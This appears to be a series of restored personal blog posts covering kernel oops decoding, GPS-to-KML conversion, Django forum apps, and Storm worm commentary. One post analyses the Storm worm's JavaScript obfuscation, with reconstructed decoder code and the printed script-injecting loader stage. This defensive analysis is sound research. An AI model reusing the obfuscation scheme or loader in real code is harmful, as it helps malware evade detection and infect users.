kernel: [<f887940e>] nfnetlink_rcv_msg+0x16e/0x200 [nfnetlink]
kernel: [<f8879542>] nfnetlink_rcv+0xa2/0x169 [nfnetlink]
kernel: [<c02beecd>] netlink_unicast+0x16d/0x250
kernel: [<c02bf462>] netlink_data_ready+0x12/0x50
kernel: [<c02be2d1>] netlink_sendskb+0x21/0x40
kernel: [<c02bfacd>] netlink_sendmsg+0x27d/0x320
kernel: [<c0116c88>] __wake_up+0x38/0x50
kernel: [<c02a2b2e>] sock_sendmsg+0xae/0xe0
kernel: [<c012f4c0>] autoremove_wake_function+0x0/0x50
kernel: [<c012f4c0>] autoremove_wake_function+0x0/0x50
kernel: [<f90caa7f>] monkey_chan_queue_append+0x15f/0x170 [monkey]
kernel: [<c02a9e4a>] verify_iovec+0x2a/0x90
kernel: [<c02a306d>] sys_sendmsg+0x15d/0x270
kernel: [<c02a3f86>] sys_recvfrom+0x116/0x140
kernel: [<f90557c0>] e1000_clean_rx_irq+0x0/0x3d0 [e1000]
kernel: [<f9053b0e>] e1000_clean+0x53e/0x780 [e1000]
kernel: [<f90c7780>] mkyGetState+0x20/0x30 [monkey]
kernel: [<f9ddbc90>] packet_writer+0x2e0/0xd50 [monkey_pkt_eater]
kernel: [<c02a453f>] sys_socketcall+0x24f/0x280
kernel: [<c013a5b0>] __do_IRQ+0xc0/0x110
kernel: [<c0102d3f>] sysenter_past_esp+0x54/0x75

Think of this as analogous to “bt” in gdb; it is generated by show_trace_log_lvl in arch/i386/kernel/traps.c. But be aware that it can be broken: what if your bug involved mucking up data on the stack?

What we know at this point is that the put_page where our problem occurred was called by skb_release_data (aha! networking code!), which in turn was called by kfree_skbmem, and that by mkyDestroyPacket. That last item, from the monkey_pkt_eater module, comes from our proprietary code. Our suspicion is that we have, for some reason, given some bad data to kfree_skbmem.

kernel: Code: c0 8b 01 01 c2 83 fa 10 89 11 7f 05 83 fa f0 7d 0d f0 01 15 fc 8f
    40 c0 c7 01 00 00 00 00 c3 8d 76 00 8d bc 27 00 00 00 00 89 c2 <8b> 00 f6
    c4 40 75 1e 8b 42 04 40 74 1f f0 83 42 04 ff 0f 98 c0 

Personally I find this the most exciting part of the oops. A sequence of hex values, joy! But what is the “Code:“? Quite simple really. The kernel takes the value of EIP, subtracts 43 then prints out 64 bytes from that point, marking the byte at EIP with <..>. I.e. it is a hexdump of the section of machine code being run at the time the oops occurred. And this means we can disassemble.

But it might not be as straightforward as we’d like. That “-43” means the hex-dump could start anywhere, maybe right in the middle of an instruction. So I suggest either removing everything prior to EIP (remove everything before <8b>) or starting at the symbol address that EIP maps into. The latter option is only going to work if the offset from the symbol is less than 43; in our case we’re lucky because in put_page+0x2/0x40 we’re given that the offset is only 2 bytes, so we can safely cut the code down to this:

    89 c2 <8b> 00 f6 c4 40 75 1e 8b 42 04 40 74 1f f0 83 42 04 ff 0f 98 c0 
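If you’d rather not trim by hand, the first option (keeping everything from the marked EIP byte onward) is a one-line sed job; this assumes you’ve joined the Code: dump into a single string with the <..> marker intact:

```shell
#!/bin/sh
# Cut an oops "Code:" hex dump down to the <..>-marked EIP byte, giving
# a known instruction boundary to start disassembling from.
code='89 c2 <8b> 00 f6 c4 40 75 1e 8b 42 04 40 74 1f'
echo "$code" | sed 's/.*<\(..\)>/\1/'
# -> 8b 00 f6 c4 40 75 1e 8b 42 04 40 74 1f
```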

Now we can employ trusty xxd to reverse the hex to a binary file:

:; echo '89 c2 8b 00 f6 c4 40 75 1e 8b 42 04 40 74 1f f0 83 42 04 ff 0f 98 c0' | 
    sed 's/[^0-9a-f]//g;s/^/0: /' |  
    xxd -r  -c 256 > code.bin

What do we do with this code.bin file? Our next friendly tool is objdump, which won’t accept data from STDIN or via <(...), hence the temporary code.bin file rather than a pipe. With objdump we do this and get:

:; objdump -b binary -m i386 -D code.bin 

code.bin:     file format binary

Disassembly of section .data:

0000000000000000 <.data>:
   0:   89 c2                   mov    %eax,%edx
   2:   8b 00                   mov    (%eax),%eax
   4:   f6 c4 40                test   $0x40,%ah
   7:   75 1e                   jne    0x27
   9:   8b 42 04                mov    0x4(%edx),%eax
   c:   40                      inc    %eax
   d:   74 1f                   je     0x2e
   f:   f0 83 42 04 ff          lock addl $0xffffffff,0x4(%edx)
  14:   0f 98 c0                sets   %al

Some really hard-core people familiar with machine code read it like assembly, and can easily work out the instruction sequence prior to put_page too. But if that was you then you wouldn’t be reading this I think.

What we know now is that the oops occurred in the assembly above at offset 2, at “mov (%eax),%eax“, which moves the word at the address stored in %eax into %eax. We can surmise that our invalid address is stored in %eax, and looking further up the oops, at the register dump, we see that %eax contains 0x68230a7d: the bad address that the very first line of the oops gave us. We now know the exact problem, but it isn’t really any use to us without some context, is it?

Thinking a little further, we know that offset 0 in the assembly above is the entry point of the put_page function, so the only instruction belonging to the function prior to where the error occurs is “mov %eax,%edx“. Logically it seems that an argument to put_page was provided in %eax (which, as the register dump shows, holds the same 0x68230a7d and is copied into %edx at entry), and that this argument provides the bad address.

At this point we still don’t have any useful context and really need to start looking at a more complete picture of the code involved. That’s the subject of the next entry in this series.

[With some amusement I note that during the week I was dealing with the problem that prompted me to write this stuff the topic of “decoding oopses” became somewhat popular on LKML! Heh, great timing. This renders my own efforts somewhat redundant, oh well.]

Crafting KML from Garmin GPS Data

Note: This entry has been restored from old archives.

This entry explores my journey from getting a Garmin eTrex Vista HCx GPS unit to generating a KML file that shows information I’ve gathered on my GPS via the Google Maps website (and, in theory, also Google Earth). It’s only lightly technical, more a review of the process than an instructional reference. I expect, and hope, there are more efficient ways to go about doing what I’ve done here.

I mentioned a little while ago that a recent addition to my toybox is a Garmin eTrex Vista HCx (AmazonUK). I’ve used this a lot over the last few months and am very happy with the purchase. The primary reason for having the device is that we like to ramble around the countryside a lot. A stint of Rogaining and Orienteering in high-school left me with very good map navigation skills, which have served me well. But when trekking around, especially moving at speed, referring to a paper map regularly can be a bit of an encumbrance. Enter the GPS, it fits in my hand and always tells me exactly where I am. There’s one important thing to be aware of though: it’d really not be so much use without a good map set.

The map set I have is Garmin TOPO Great Britain (AmazonUK). I don’t have much to compare it to in GPS-land. What I can say is that it is better for walkers than all the online mapping I’ve seen, except for those that present sections of the Ordnance Survey maps (like MultiMap used to at high zoom levels, but it just seems to use Google Map data now). Additionally, this Garmin map is actually derived from the Ordnance Survey data. This is a huge bonus for walkers. Any UK rambler should know the greatness of the OS Explorer and Landranger map sets. With the TOPO Great Britain maps on your GPS you’ll have the great feature that contours shown on the GPS unit are the same as those on the OS maps — making it very easy to place yourself on an OS map.

An OS map you say? Yes, I don’t consider the GPS to be a complete replacement. First, in deference to screen size, the maps are nowhere near as detailed as the OS maps. They have roads, water features, contours, and some terrain information — but they lack all the additional details found on the OS maps. The most important thing lacking on the Garmin map is full coverage of all the footpaths, bridleways, and byways marked on the OS maps. That sucks quite a bit.

The other obvious great features of this GPS unit are that it can store the path of your travels (you can save several tracks, I did this to map ski slopes and lifts individually in Ylläs), and you can mark waypoints for locations of interest. Then you can move this data between the unit and a PC. Walking geek heaven!

It isn’t all plain sailing though. Garmin sell their GPS units, and then want to make a ton more money on maps. As it comes the GPS isn’t a lot of use for walkers, it has only main roads loaded. So as well as spending more than 200 quid on the unit you’ll need to spend a further 100 quid for the UK maps. Ouch! There are a lot of complaints to be found on the web about this particular point, people don’t realise that the maps the Garmin units come with are rather crap. This seems to be a factor in a lot of negative reviews for the various eTrex units.

The eTrex Vista HCx I got is top of its line; you can spend a little less by getting one without a barometric altimeter and compass, such as the Garmin eTrex Legend HCx, or one of the Cx models, which are slower and less accurate than the HCx ones (but have longer battery life). Garmin actually provides a nice feature comparison tool on their site, here’s the eTrex models with SD card slots compared. The altimeter and compass are features that I’m a bit iffy about anyway, after three months of use. The altimeter needs regular recalibration, and since you almost always have a (more accurate) 3D GPS lock it is redundant, and the compass doesn’t seem as stable as a “real” one.

You’ll also need to spend a little extra on a microSD/TransFlash card. You don’t need a huge one though; I’m using a 256MB card and it fits the entire set of maps covering greater London in a fraction of its space. You could probably fit the entire map set on a 1GB card (a total guess). There’s not much point buying a new one that’s smaller than that though, they’re as cheap as chips (har har) now. I picked up a 1GB one for about 8 quid (they’re 6 now) and put it into another device to free up the 256MB card.

The other stormy waters are around their MapSource software (“free” with the unit, thankfully), and their documentation is pretty crap. It isn’t abysmal, but as someone extremely familiar with the world of software my opinion is that it sits firmly in the massive ranks of the “mediocre”. Of course, I’m also a Linux geek so using their software has an added disadvantage for me: I’d have to reboot into Windows to use it. Maybe it’ll work in Wine? Maybe I’d rather be doing other things with my time?

Luckily for us Linux dweebs there are plenty of industrious monkeys out there pushing their valuable hours into great software! The biggest and hairiest monkey is Google. Their online maps setup is geek heaven, and Google Earth is software bling at its finest. Now, Google Earth can supposedly hook up with my GPS unit and make sweet love… if I pay for the non-free version, that is. I don’t have anything against paying for this, but have refrained thus far since I’ve had terrible problems getting Google Earth to even work on my Ubuntu or Debian systems. sigh

So, I need a bridge. This bridge is given to the world in the form of gpsbabel. It speaks several map-data and GPS-device languages fluently! Brilliant!

What I typically want to do with my GPS data is push it from the device to a format I can use to display the data on the Google Maps website. The desired format is Google’s “KML” (tutorial/examples), the same file format that drives Google Earth.

For purposes of demonstration the rest of this post uses my GPS unit with a load of tracks and waypoints on it I saved while I was in Finland, the goal is to get a neat map of the area I visited out of the Garmin and onto Google. I had other data on the device though, so I chose a lat-long point from one of my Finland waypoints and only grabbed data within a 200 mile radius of that point. To do this we employ the ‘garmin‘ driver to suck the data, the ‘radius‘ driver to filter out unwanted points, and the ‘kml‘ driver to poop the data out to a nice KML file:

:; gpsbabel -i garmin -f /dev/ttyUSB0 -w -t \
            -x radius,lon=24.171808,lat=67.604049,distance=200 \
            -o kml,points=0 -F gpsbabel.kml

Note the ‘points=0‘; if you don’t do this you get a “waypoint” for every point in your tracklog. If you don’t need these it is best to avoid them: my KML file was 137kB without the points and 34MB with them, ouch!

Nothing is simple though. Now I want to prettify my KML. This involved going through by hand and editing the marker names and descriptions, and adding in CDATA HTML sections to embed links and images for waypoints. The former is mostly necessary since the GPS doesn’t allow names longer than 12 chars (not enough), and the transfer maps non-ASCII characters (i.e. Unicode) to ‘$’. Note that for names you can use XML-permitted entities like &amp; but not most HTML ones: for ä you can’t use &auml;, you’ll need to use the Unicode character itself.

Now I want my own waypoint icons and path colours. This requires removing the styles set by gpsbabel and defining a set of your own. For example I want a style for markers that show hotels, I define this:

    <Style id="waypoint_hotel">
      <IconStyle>
        <scale>1.2</scale>
        <Icon>
          <href>http://maps.google.com/mapfiles/ms/micons/lodging.png</href>
        </Icon>
      </IconStyle>
    </Style>

There’s a useful link for the “standard” Google Maps icon set here.

I also want to define my own line widths and colours for different classes of track. Good to distinguish between walking routes and bus routes, especially good in this case for the different grades of ski slope! Here’s a sample line style:

    <Style id="track_ski_easy">
      <LineStyle>
        <color>aaff3333</color>
        <width>4</width>
      </LineStyle>
    </Style>

Note the <color> is not as the HTML-familiar would expect! The hex fields are ‘aabbggrr’, that’s aa=alpha, bb=blue, gg=green, rr=red. So a 50% transparent cyan line is actually 80ffff00. Such a simple thing, yet it breaks my rrggbb indoctrinated brain!
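To spare my rrggbb-indoctrinated brain I use a tiny helper for the reordering. A sketch (kml_color is my own name for it), taking an HTML-order rrggbb value plus an alpha byte:

```shell
#!/bin/sh
# kml_color: convert an HTML-order "rrggbb" colour and an alpha byte
# into the "aabbggrr" order KML <color> elements expect. (My own helper.)
kml_color() {
    rr=$(printf '%s' "$1" | cut -c1-2)
    gg=$(printf '%s' "$1" | cut -c3-4)
    bb=$(printf '%s' "$1" | cut -c5-6)
    printf '%s%s%s%s\n' "$2" "$bb" "$gg" "$rr"
}

kml_color 00ffff 80   # 50% transparent cyan -> 80ffff00
```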

Oops! Height and distance data embedded in KML description fields by gpsbabel is in miles and feet, I hate miles and feet! Maybe gpsbabel can be asked to use metric units but I don’t see an obvious way to tell it to do so. (Update: Thanks to the “Chief (GPS)Babel-head” (see comments) I now know that the ‘kml‘ driver has a ‘units‘ argument, i.e. ‘units=m‘ — I didn’t RTFM well enough.) Anyway, I’ve just put loads of effort into customising my KML, so time to do it with perl, yeah, sure, ewww. shrug

perl -ne \
  'if (/(\d*\.\d*) mi/)
      { $x = $1 * 1.609344; s/\Q$1\E mi/$x km/; print $_; }
   else
      { print $_; }' \
  YllasAkasSkiHoliday-26.kml > YllasAkasSkiHoliday-27.kml

It took me a whole evening to work through all this and get my final KML. I hope it’ll be easier next time around. It certainly isn’t for everyone.

The best way to describe all the details is by example, so check out my full Ylläs Ski Trip KML for the gory internal details, and here’s a link to my Ylläs mapping data displayed by Google Maps. The iframe to the right (assuming you support iframes) is zoomed in on the part of the map data showing the ski slopes and lifts that I mapped. The dark grey lines are the lifts (recycle signs mark the bottom of the lift), the green (very easy) and blue (easy) lines are the slopes. It’s cool how my weaving back and forth (at speed) on the slopes is captured so well by the GPS!

In conclusion:

  1. It might look like a horrid process, and it might have taken a lot of effort, but I did enjoy it.
  2. That said, I hope that Google Earth can do this WYSIWYG style or something. That’d make this sort of thing much more friendly.
  3. Joy, one more dependency out of the way, so I might get that write-up of the Ylläs ski trip finished.
  4. Don’t forget that you can use gpsbabel to upload data from KML files to your GPS too!
  5. I wanted a topo map of Finland for the Garmin, I found it, but it makes the GB Topo map look cheap! At least you can buy it in parts, at the link given it is 99 euro per CD, and Finland is covered by 6 CDs.

Django Forum Software

Note: This entry has been restored from old archives.

Update 2008-02-25 20:24: I’ve only made small progress on examining each of the options below as I haven’t had much time for personal projects in the last couple of months. An important point to note is that some of these didn’t work with Django-trunk, so certainly check that if you’re not working with the development version (conversely, some might not work with 0.96 I guess.) Note, from the comments, Antti Kaihola has created a “Django Forum Apps Comparison” on the django wiki, it’s well worth checking that out as it’ll be more complete and more up to date than my list.

I’ve been toying with a community site recently. The logical starting point for the code behind it is discussion functionality. The idea is to take some existing code that does “forums” well and use this as the kernel that the community site is built around. Nothing is ever so easy though; the ‘net and developer communities have grown so huge that we’re not talking a needle in a haystack but finding the right needle in a haystack full of needles. There’s a scattering of good needles, but a lot of blunt or downright broken ones.

I’ve locked myself into Django now, but even having already determined the web framework to use (i.e. choosing a smaller haystack) the task isn’t trivial. I think that a general issue here is this exact experience I’m having: people give up eventually, try to spin their own, get big ideas, publish their half-baked code, and make it just a little harder for the next person trying to find pre-existing functionality. It doesn’t help that Django’s relatively young. I don’t make life easy for myself sometimes!

Here’s my small attempt to work against the trend. I’ve gathered a list of the Django forum/discussion software I’ve found and associated each project with any further useful information that might help the decision of which to use. I’ve filtered out anything that was clearly broken, but don’t know the level of completeness of everything listed here.

Also, I’m sure there’s other projects out there I’ve missed! I’ll update this page if I find anything new.

I’m not recommending any of these, maybe that’ll come later once I’ve actually decided which one to work with.

Ross’s Django Forum (the django-forum)

“Simple Django Forum Component”

This seems to be the most linked-to Django forum software out there. It seems basic, but I haven’t tested it or seen a demo. I’ve seen various blog comments remarking on either its “lack of features” or “ease of installation and use” — how many “features” do people really need?

Jonathan’s Django Forum

Almost got this one mixed up with django-forum above. At least it has a demo site! The demo looks like it has all the basic expected components working.

counterpoint

“forum written with django”

Very little information about this out there, the code is available though. I’ve seen a comment on a blog post from Nov 29th 2007 that says “missing much functionality”, it’s a young project though and that was a month ago.

snapboard

“Python Forum/Bulletin-Board for Django”
“SNAPboard: S(imple), N(imble), A(ttractive), P(ython) board”

In a way this one seems to do the best job of selling itself. The Google Code frontpage and wiki (documentation) are good. However, activity on the project has dropped off and a new maintainer has come on board recently (December 11th according to a forum post).

Django Discussion (django-discussion)

“A generic discussion application for Django”

I’m guessing this is the same author as the second item in this list, pretty unlikely coincidence otherwise? Anyway, the code seems to be different, so a different project?

  • Google Code: http://code.google.com/p/django-discussion/
  • Owner: Jonathan Buchanan (Same author as the second forum in the list I’m guessing, but the code seems very different.)
  • Initial checkin: 2007-03-15
  • Latest update: 2007-12-08 (only 9 changes since creation, but recently active at least)

Diamanda “MyghtyBoard”

“Diamanda Wiki and Forum”

Diamanda isn’t only a “forum”, it’s a site-builder toolkit that contains a complete “forum” subcomponent called “MyghtyBoard”. The forum seems to possess all the expected features. Development started quite some time ago and was regular up until early 2007; perhaps it reached a degree of feature completeness? A recent “bug report” is “rewrite code for better look and use” with the response “I will in time :)” (6 days ago).

Sphene Community Tools

“Django Forum Application and Django Wiki Application”

Like Diamanda, this is a toolkit that happens to include a forum. I’m assuming that the forum on their site represents a demo of SCT in action. This project looks like the most active of the lot and seems to be quite well documented.

ENDE

That’s the lot for the moment.

Bad Weather

Note: This entry has been restored from old archives.

The last two days have been somewhat joyous in a less than traditional sense. Two whole days with all computers shut off! OK, so not that much different from our recent holiday without work/computers, but more relaxing.

The reason for the title is twofold. Firstly, the weather here really is rather shit. It’s England! What should I expect? Christmas day was chilly and wet; at least on Boxing Day there was a little sunlight. Dreaming of a white Christmas around London? Not much chance these days it would seem. This is my third in the UK. The first was white thanks only to a heavy frost; there was a little snow around the period, but it wasn’t so cold that I didn’t spend the day on my bike in Wendover Woods. Last year it was cold at least. This year it isn’t even chilly, there isn’t one zero or sub-zero day predicted in the entire last week of the month! Today has a predicted minimum of 9 — I can quite comfortably wear just a thin t-shirt under an unbuttoned jacket. Oh well.

The other bad storm is one of 2007’s old favourites, the Zhelatin/Storm/Nuwar “worm”. After somewhat of a lull in seeing emails from this network I suddenly got one on the 23rd, as I mentioned on Monday.

This turned out to be the first of many as the network pumped out a full-scale assault capitalising on the jovial season, both Christmas and New Year. Taking advantage in two ways I think: 1) people probably are sending a lot of stupid email right now so it may be more likely that people follow the evil links, 2) A lot of people, including those in the security industry and the IT-shops responsible for maintaining corporate security, are on holiday so the “good guys” may have a slower response time.

The latter point is worth some thought. I’m sure it has been discussed before: computers don’t have holidays, crims take advantage of holidays, most normal people let their guard down on holidays. Good news for botnet herders. As I mentioned earlier in the week the malware payload wasn’t detected by any of the large-market-share AV engines, the biggest player to detect some of the samples I tried was Kaspersky (finding accurate market-share figures is difficult, suggestions on the net for KAV are between 5 and 1 percent). As has now been clearly established, I’d think, the malware writers test against the biggest AV engines. We can get a good picture of which engines they’re testing with by rounding up as many of these jolly-Storms as possible and scanning them to see which engines, when loaded with a pre-mailout database, detect close to 0% of the samples. The list you’ll find isn’t all that surprising.

It’d be really nice to have a good statistic on the size of the botnet on December 20th versus the size on January 7th. But all botnet size estimates are generally a product of bad guesstimation, we can’t expect anyone to know the numbers except the ones in control.

I’m becoming more pessimistic about the situation as time goes on. The concept of a “virus filter” product seems to have been proven fatally flawed. Whether detection takes place via signatures or “heuristics” (in my opinion this is little more than complicated signatures) the approach is reactive. Either to specific malware or to specific exploits, the latter gets a lot of press as “generic” detection usually classified as “heuristic” but in the end is just reactive detection taken from a different angle. AV engines do have their place, but they’re not a solution — certainly not anymore. A small thought, and privacy advocates would hate this thought, is that maybe the AV vendors need to make their software 100%-report-to-base. Try to take some of the testing ability away from the criminals? Could this even be workable, what information could you report to base that’d help? How long would it be before the bad guys subverted the process or simply circumvented it… probably not long. sigh

I guess this is why the security industry is diversifying into more elements of command and control; maybe there is some light at the end of the tunnel? Of course it is likely that anything of this sort is best done at-or-below the OS level, thus by the OS vendor, but when Microsoft tried to do this for Vista there was an all-out cry of foul from the AV industry! Protecting themselves, or protecting users from the likelihood that Microsoft would get it wrong? A bit of both I expect.

In this direction a lot of noise was made about one thing in the last year that to me smells like a load of bollocks: virtualisation. It’s a very neat geek-toy that has both spawned its own industry around maintaining systems and been co-opted by the security industry in a way that stinks of “silver-bullet”. The former works for me, but I think we want to keep in mind that virtualisation used this way is just an evolutionary step. Virtualisation for robustness/etc is a neat replacement for things like telnettable power supplies and Dell DRAC (remote administration) hardware. Security tends to be fitted in from a perspective of keeping an eye on things from the outside. We like this image because it works fairly well with physical-world security systems. My guess is that it isn’t going to work out quite as neatly or easily as hoped when it comes to anti-malware. I think the best anti-virtualisation FUD I’ve seen came from Theo, of OpenBSD fame.

[Update: In case it isn’t as blindly obvious as I thought, I agree with Theo de Raadt’s FUD (though I don’t understand why anybody thinks my agreement or labelling matters). sigh “FUD” is just a TLA, please attach less emotion to it Internet randoms. I’m wasting my time since the complaint I received was clearly derived purely from the sight of the TLA, with the context ignored. Anyway, FUD = “Fear, Uncertainty, and Doubt” and in my mind is a mere function of marketing. Negative marketing based on perceived flaws in the security sphere is a case of FUD (since this is what it causes), sometimes for good (being informative), sometimes for bad (being misleading). Pro-virtualisation-for-security people will label de Raadt’s opinion as FUD in the traditional sense, but I bag up what they see as smelly manure and feed it to my roses. I apologise for going against the grain of the TLA and upsetting a poor sensitive soul or two. To repeat: I, in my non-expert opinion, am more convinced by Theo’s FUD than the FUD from the other side of the argument. If it makes you feel better execute a mental s/FUD/marketing/g or just go away.]

Still, we have to grasp at what straws present themselves. (Remembering to let go of the ones that have burnt all the way down to our fingers.) I try to remind myself that entirely giving up hope is not the correct response. Especially while people are profiting from criminal acts that take advantage of the industry’s current failure to adequately deal with the problem.

At this moment, given a corporate network to run and short of “running with scissors”, I’d be focusing attention on environment control. Mostly meaning various approaches to controlled execution. I don’t think it’s an easy path, but does anyone expect a solution to really be “easy”? Hah! There’s a strong chance it’d just turn into another reactive scene: say we allow IE to run, fine, then malware runs its own code as part of IE. (Through one of virtually limitless vectors, from buffer overflows inserting actual machine code to simple exploitation of design flaws in JS/VBS/Flash/plugin-X/technology-Y.) What about the much-maligned (at least it is in OSS/FSF circles) TPM approach? (Maybe just simplified virtualisation that’ll come with a heap of its own new flaws.)

Network segregation should offer some relief and damage control. Do users really always need to access email/web from the same machine they access the IRS/HMRC/etc database from? At least if there is an infection (inevitable?) it can only go so far. This is heading into DLP territory though, which is a different problem and mostly the bugs that need to be fixed are in process and people.

Have we given up on user education yet? It’s bloody difficult, but I hope not. We can’t really expect people to always do the right thing, just as we can’t expect programmers who know they should validate all user data to always remember to do so (humans tend to be lazy by preference!). That said, the situation is certainly worse if they don’t even know what the right/wrong things are!

It’s easy to become despondent. I’m certainly not all that happy with the industry that I, in a small way, am part of. Taken as a whole the last year or two has been pretty abysmal. Surely things can only improve from this point?

Storm Worm Vigenère

Note: This entry has been restored from old archives.

A small hobby of mine is picking apart JavaScript/ECMA obfuscation such as that used by the Zhelatin/Storm/Nuwar “worm”. My usual approach, which is certainly inefficient, is to grok the actual code by translating it to Perl. I’ve written about this before in “Someone Doesn’t Like Kaspersky“.

I don’t usually have time, after wasting much in the process of grokking, to write about these critters and I don’t expect that to change much! Time is so hard to come by! But after looking at some of the code with recent Storm mailings I think it’s worth noting the evolution.

The previous obfuscation I’ve written about is simple application of “xor encryption”, and much of what I’ve seen has been a variation on this at a similar level of simplicity.

The basic xor case worked along the lines of the following pattern.

    function decode(A,B) {
        ...
        eval(C);
    }
    decode(ciphertext,key);

In this case the key (and thus ciphertext) value was randomly generated for different visits to the page. In the decode function B is applied byte-by-byte to A to gain the plaintext C. Usually this processing was xor (^) and was further complicated with a URI decode or something of that ilk.
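To make the pattern concrete, here’s a minimal sketch of that style of xor decoder, not the actual worm code; the function and variable names (xorDecode, ciphertext, key) are my own, where real samples used randomised names and typically added a URI-decode step:

```javascript
// Minimal sketch of the old-style xor decoder pattern (illustrative only).
// The key is applied byte-by-byte, repeating over the ciphertext.
function xorDecode(ciphertext, key) {
    var plain = "";
    for (var i = 0; i < ciphertext.length; i++) {
        plain += String.fromCharCode(
            ciphertext.charCodeAt(i) ^ key.charCodeAt(i % key.length)
        );
    }
    return plain; // the malware would eval(plain) at this point
}

// Round-trip demo: xor is its own inverse, so encoding and decoding
// are the same operation with the same key.
var secret  = "alert('hi')";
var encoded = xorDecode(secret, "k3y");
console.log(xorDecode(encoded, "k3y")); // → alert('hi')
```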

The sample I have looked at most recently has the following form.

    function X(Y) {
        ...
        eval(Z);
    }
    X(payload);

The key differences are that the function name (X) is now a variable and the obvious key input is gone, which hints at something. What’s changed inside the code? Well, working from the final decrypt up to the start of the function, this is what happens (somewhat simplified, but this is the core pattern):

  1. An array of 8 bytes is used as a key to shift the values in the input array in the manner of a classic Vigenère cipher (applied mod-256).
  2. The key array is obtained by encoding a 32 bit value (i.e. 2309737967) to hex (0x89ABCDEF) and using the ASCII value of each hex digit to populate the key array ([56, 57, 65, 66, 67, 68, 69, 70]).
  3. The 32 bit value is obtained by condensing an array of 256 integers (array256) and the text of the decode function (funcText) into an integer! The method iterates over characters in funcText using the byte values as lookup indexes in array256. Complete detail: key=0xFFFFFFFF; then for i in 0 to length(funcText) do:
    key=(array256[(key^funcText[i]) & 0xFF] ^ ((key >> 8) & 0xFFFFFF))
  4. The text of the decode function is obtained with arguments.callee.toString(), which has non-word chars stripped out and is converted to all-caps. Thus the importance of the function name X as an input parameter to the obfuscation; it doesn’t stop there, as the text of the rest of the function body is also part of this key material and is full of randomised variable names. As you may have guessed, it is the random function and variable names that change from one downloading of the script to another, rather than just the xor key.
  5. The array of 256 integers is generated from a simple algorithm with a seed value, no need to detail it I think. It’s worth observing that between the different downloads of the script I saw the effective seed value didn’t change so this array remained constant.
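The steps above can be sketched as follows. This is my own hedged reconstruction, not the sample’s code: I’ve assumed a standard CRC-32-style table (polynomial 0xEDB88320) for the 256-integer array, since the iteration in step 3 matches the classic CRC-32 update; the real sample used its own seeded generator, and all names here are mine.

```javascript
// Step 5 (assumed): a CRC-32-style lookup table stands in for array256.
function makeTable() {
    var table = [];
    for (var n = 0; n < 256; n++) {
        var c = n;
        for (var k = 0; k < 8; k++) {
            c = (c & 1) ? (0xEDB88320 ^ (c >>> 1)) : (c >>> 1);
        }
        table[n] = c;
    }
    return table;
}

// Step 3: condense the decode function's own text into a 32-bit value,
// exactly as described: key = array256[(key ^ byte) & 0xFF] ^ ((key >> 8) & 0xFFFFFF).
function hashFuncText(funcText, table) {
    var key = 0xFFFFFFFF;
    for (var i = 0; i < funcText.length; i++) {
        key = table[(key ^ funcText.charCodeAt(i)) & 0xFF] ^ ((key >> 8) & 0xFFFFFF);
    }
    return key >>> 0; // force an unsigned 32-bit result
}

// Step 2: hex-encode the value and use the ASCII codes of the hex digits
// as the byte key array.
function keyBytes(value) {
    var hex = value.toString(16).toUpperCase();
    var bytes = [];
    for (var i = 0; i < hex.length; i++) bytes.push(hex.charCodeAt(i));
    return bytes;
}

// Step 1: undo the Vigenère shift, mod 256, to recover the plaintext bytes.
function vigenereDecode(data, key) {
    var out = [];
    for (var i = 0; i < data.length; i++) {
        out.push((data[i] - key[i % key.length] + 256) % 256);
    }
    return out;
}
```

Note how the function text feeds the hash: rename anything in the decoder and the derived key, and therefore the decryption, breaks.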

Certainly much more complicated than the old xor code! But, I’d hope, a waste of time — since AV suspicious-script detection should work off generic patterns visible in the script from inspection rather than relying on the variable details. Still, only 3 AV engines on virustotal.com thought this script was worth noting as “generic obfuscated HTML”, but I don’t know what script/browser components they have enabled so I wouldn’t trust these out-of-context results. Many AV products exhibit different, usually more paranoid, behaviour when scanning in-browser data and HTTP at the gateway. And, looking at the whole Storm picture, this little snippet of code is just part of the delivery mechanism, it’s more important that the actual browser exploits and malware executables are caught!

Anyway, back to the script, this thing unwraps like a matryoshka doll. The plaintext is the same algorithm over again with new randomly generated function/variable names and a new ciphertext. The new ciphertext is much shorter though and after decoding we’re finished with this sample. The end result is javascript that generates a script DOM element and appends this to the document.

    var script = document.createElement("script");

    script.setAttribute("language", "JavaScript");
    script.setAttribute("src", "<nasty_local_url>");

    document.body.appendChild(script);

The most interesting item in the sample is this use of arguments.callee.toString() as key material. No doubt a direct defence against the usual malware-researcher practice of changing the final eval into an alert to expose the plaintext. While an admirable attempt at making life harder for researchers it’s not difficult to circumvent: just create a new variable assigned to the text “function X(Y) { ... }” and use this in place of the arguments.callee.toString(), and good old alert should do its usual trick (then unwrap the next shell of the matryoshka). (Yes, “function” and all the rest are included, though braces/punctuation don’t matter in the samples I have since an s/\W//g is applied to the text.)
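A quick sketch of that workaround, with hypothetical names (savedSource, normalise); the saved text would be a verbatim copy of the sample’s decode function, elided here:

```javascript
// Instead of letting the sample derive its key from arguments.callee.toString(),
// hand it a saved copy of the original function text. The body below is a
// placeholder — it must be the sample's decoder, copied verbatim.
var savedSource = "function X(Y) { /* original body, copied verbatim */ }";

// The sample normalises the text the same way before keying:
// strip non-word chars (s/\W//g) and convert to all-caps.
function normalise(text) {
    return text.replace(/\W/g, "").toUpperCase();
}

var keyMaterial = normalise(savedSource);
// ...derive the key from keyMaterial as before, then replace the final
// eval(plaintext) with alert(plaintext) to expose the next layer.
```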

The other “new technology” here is intriguing but not remarkable: using Vigenère instead of xor seems a curiosity more than a real advance (they’re certainly not doing it to hide the tell-tale use of the xor operator in a loop, since they use xor in the key generation loops). Honestly, it looks just like some geek having fun, like me… but in this case we have a bad geek. Tut tut.

I’ve put a de-obfuscated and commented version of the script code up as well as a page containing active JavaScript that demonstrates the code. (Don’t worry, the active page’s payload is just an “alert” call!)

Christmas Storm

Note: This entry has been restored from old archives.

It’s been a while since I’ve had a Zhelatin/Storm/Nuwar mail get through to my inbox. Just in time for Christmas I get a shiny new one! It wishes me “Merry Christmas Dude” and provides a suitable URL for the season, no suspicious IP address link for this special occasion.

This one is a little different to previous efforts I’ve looked at. The embedded javascript isn’t malicious at all, in fact it is JSnow v0.2 complete with copyright notice. Snow! Joy! Is our favourite bot-net wishing us all a good Christmas out of good old fashioned social benevolence? Ha, fat chance! The page displays for us a set of scantily clad Mrs Clauses, enticing us to click on them for more. The link is to stripshow.exe, just less than 50% of the scanners on virustotal.com detect this at the moment. The list of ones that miss is conspicuously a round-up of the set with the largest market-share (interspersed with the ones that simply suck), this shouldn’t be any surprise these days.

